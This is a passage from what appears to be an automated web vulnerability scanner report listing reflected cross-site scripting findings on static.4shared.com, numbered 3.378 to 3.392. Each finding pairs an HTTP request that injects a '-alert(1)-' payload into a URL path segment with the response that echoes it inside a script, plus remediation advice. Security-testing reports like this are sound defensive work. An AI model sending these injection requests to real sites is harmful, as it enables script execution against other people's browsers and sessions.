<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css498ae"-alert(1)-"582fd7f25e7/common.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.378. http://static.4shared.com/css/common.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddd86"-alert(1)-"e7244271d61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/common.cssddd86"-alert(1)-"e7244271d61 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/common.cssddd86&quot;-alert(1)-&quot;e7244271d61
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E72E8FA400055E4F31C2D8E5BECF0112.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:30 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/common.cssddd86"-alert(1)-"e7244271d61";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.379. http://static.4shared.com/css/coolbuttons.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/coolbuttons.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 658a0"-alert(1)-"488f25f19da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css658a0"-alert(1)-"488f25f19da/coolbuttons.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css658a0&quot;-alert(1)-&quot;488f25f19da/coolbuttons.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=982CF7DB786472C50698080400077D8F.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:14 GMT
Content-Length: 36179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css658a0"-alert(1)-"488f25f19da/coolbuttons.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

3.380. http://static.4shared.com/css/coolbuttons.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/coolbuttons.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebafb"-alert(1)-"74fc1488d18 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/coolbuttons.cssebafb"-alert(1)-"74fc1488d18?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/coolbuttons.cssebafb&quot;-alert(1)-&quot;74fc1488d18
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=272DE1FC343CD7FCD18B47BB2B44D346.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:17 GMT
Content-Length: 36190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/coolbuttons.cssebafb"-alert(1)-"74fc1488d18";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.381. http://static.4shared.com/css/features.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/features.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d0b9"-alert(1)-"5faf4995697 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css4d0b9"-alert(1)-"5faf4995697/features.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css4d0b9&quot;-alert(1)-&quot;5faf4995697/features.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FFA7B8C14C0841DA4DF96AD5595073B3.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:52 GMT
Content-Length: 36175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css4d0b9"-alert(1)-"5faf4995697/features.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.382. http://static.4shared.com/css/features.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/features.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79d0d"-alert(1)-"e9d06030ced was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/features.css79d0d"-alert(1)-"e9d06030ced?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/features.css79d0d&quot;-alert(1)-&quot;e9d06030ced
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7754151BBD15078673114ABBBD9C8243.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:55 GMT
Content-Length: 36175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/features.css79d0d"-alert(1)-"e9d06030ced";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.383. http://static.4shared.com/css/indexm.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/indexm.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae0da"-alert(1)-"dfc773bc8e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssae0da"-alert(1)-"dfc773bc8e7/indexm.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssae0da&quot;-alert(1)-&quot;dfc773bc8e7/indexm.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8F0322F63B8CACFDC0DAC3DC1897D6ED.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:49 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssae0da"-alert(1)-"dfc773bc8e7/indexm.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.384. http://static.4shared.com/css/indexm.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/indexm.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adf03"-alert(1)-"db77fbbc575 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/indexm.cssadf03"-alert(1)-"db77fbbc575?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/indexm.cssadf03&quot;-alert(1)-&quot;db77fbbc575
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=39624D051F6790D250B45932474C8DCE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:52 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/indexm.cssadf03"-alert(1)-"db77fbbc575";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.385. http://static.4shared.com/css/indexn.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/indexn.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c9ed"-alert(1)-"c9db170bdcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css8c9ed"-alert(1)-"c9db170bdcd/indexn.css?ver=1610 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /css8c9ed&quot;-alert(1)-&quot;c9db170bdcd/indexn.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E53A1B83159954CF79DC975D021B4F60.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:37:07 GMT
Content-Length: 36184


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css8c9ed"-alert(1)-"c9db170bdcd/indexn.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.386. http://static.4shared.com/css/indexn.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/indexn.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c78e"-alert(1)-"58cbf041f37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/indexn.css9c78e"-alert(1)-"58cbf041f37?ver=1610 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /css/indexn.css9c78e&quot;-alert(1)-&quot;58cbf041f37
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=179999491542BAC1D4F65691626D2CEE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:37:10 GMT
Content-Length: 36184


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/indexn.css9c78e"-alert(1)-"58cbf041f37";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.387. http://static.4shared.com/css/main.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c985c"-alert(1)-"b752c3bde16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssc985c"-alert(1)-"b752c3bde16/main.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssc985c&quot;-alert(1)-&quot;b752c3bde16/main.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=62828B98EDCEF6917906D0ED8AD17B11.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:49 GMT
Content-Length: 36155


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssc985c"-alert(1)-"b752c3bde16/main.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.388. http://static.4shared.com/css/main.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf57b"-alert(1)-"ff7366fe274 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/main.csscf57b"-alert(1)-"ff7366fe274?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/main.csscf57b&quot;-alert(1)-&quot;ff7366fe274
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3FD90ABD1F134D0ADB55B51E7E5F639F.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:53 GMT
Content-Length: 36155


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/main.csscf57b"-alert(1)-"ff7366fe274";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.389. http://static.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a73d5"-alert(1)-"09846515e43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssa73d5"-alert(1)-"09846515e43/mainWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssa73d5&quot;-alert(1)-&quot;09846515e43/mainWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F38DB9F45A136E8B221A34E2337C577E.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:21 GMT
Content-Length: 36209


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssa73d5"-alert(1)-"09846515e43/mainWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

3.390. http://static.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33792"-alert(1)-"feb36199e90 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/mainWithoutCommon.css33792"-alert(1)-"feb36199e90 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/mainWithoutCommon.css33792&quot;-alert(1)-&quot;feb36199e90
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=97181302BAA485314ABDA1BF00198219.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:28 GMT
Content-Length: 36220


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/mainWithoutCommon.css33792"-alert(1)-"feb36199e90";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.391. http://static.4shared.com/css/openid.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/openid.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37d0c"-alert(1)-"a384906c899 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css37d0c"-alert(1)-"a384906c899/openid.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css37d0c&quot;-alert(1)-&quot;a384906c899/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7860F21A48FF0DD57CAE4EFCFF42B9F4.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:16 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css37d0c"-alert(1)-"a384906c899/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.392. http://static.4shared.com/css/openid.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/openid.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 872dc"-alert(1)-"012793f9b37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/openid.css872dc"-alert(1)-"012793f9b37?ver=1610 HTTP/1.1
Accept: */*
